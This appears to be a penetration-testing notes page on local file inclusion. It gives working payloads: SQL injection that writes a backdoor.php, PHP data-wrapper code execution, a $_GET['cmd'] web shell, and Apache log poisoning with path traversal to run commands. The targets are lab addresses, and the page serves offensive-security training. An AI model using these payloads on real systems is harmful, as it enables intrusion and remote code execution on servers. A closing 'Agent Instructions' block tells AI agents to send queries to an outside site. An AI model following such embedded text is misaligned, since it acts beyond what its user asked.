# LFI

## Basic RCE Example:

{% tabs %}
{% tab title="LFI Read" %}
If you have SQLi or can modify templates, see if you can read a system file. If this works you can try for rce. (in this case its windows with apache):

<mark style="color:green;"><http://192.168.11.35/comment.php?id=-1> union select all 1,2,3,4,load\_file('c:/windows/system32/drivers/etc/host'),6</mark>
{% endtab %}

{% tab title="LFI RCE" %}
Find a place to upload the *backdoor.php* file or inject it with SQLi. Then use the LFI to run it on system and get RCE.&#x20;

<mark style="color:green;"><http://10.11.1.35/comment.php?id=738> union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'</mark>
{% endtab %}
{% endtabs %}

![Backdoor RCE via LFI read
&#x20;](/files/-McqoroYVQKXRWf3oRpS)

## **PHP WRAPPERS:**

#### Example 1:

<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,hello world**</mark>

![](/files/-Mcqoveib5y_XjXQNcrA)

**T**he menu page is vulnerable to LFI attacks. If we submit a payload using a data\
&#x20;wrapper, the application should treat it the text the same as a regular file and include it in the page.\
\
&#x20;<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,\<?php echo shell\_exec("dir") ?>**</mark>

{% hint style="info" %}
Often encodings are combined with this method. Below are a couple sources to get you started. <https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/File%20Inclusion%20-%20Path%20Traversal/README.md>

<https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/>
{% endhint %}

\
**EXAMPLE:**
------------

Found this code on the site:<br>

![](/files/-Mcqp-ooDOGGRxumNGp4)

include: Used to load files, (php files in this case) from the server locally and run them.\
\
In this case we can submit something other than en,fr,etc and have the server request other files. We test a common windows file to make sure our traversal works.

![](/files/-Mcqp2izb400TT48Gq00)

A null byte `%00` is used to stop the code from trying to append the php extension via the include statement.<br>

### Log File Poison RCE:

One way to get RCE with LFI is by poisoning a log file with php then displaying the file in the browser so the php is executed. We can do this by making a bad request with nc that contains our code and then read back the log with apache php.<br>

![](/files/-Mcqp5qU7CzRpA0MHdxF)

{% hint style="info" %}
Try other php shells if this does not work. It may also need the use of a pre tag to keep spacing. ex: <mark style="color:green;">\<?php echo '\<pre>' . shell\_exec($\_GET\['cmd']) . '\</pre>';?></mark>
{% endhint %}

This causes our request to get logged at : `c:\xampp\apache\logs\access.log`

{% hint style="warning" %}
`Match your log file type/path to the server you are attacking.`
{% endhint %}

#### Running the RCE:

<mark style="color:green;"><http://10.11.1.35/addguestbook.php?cmd=ipconfig\\&LANG=../../../../../../../xampp/apache/logs/access.log%00></mark>

![Log file holds our rce output](/files/-Mcqp9hdO3isIzGXbg5g)

Commands will be executed with the apache privs. From here a more persistent shell/backdoor can be established.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/web-application-hacking/web-techniques/file-and-resource-attacks/lfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.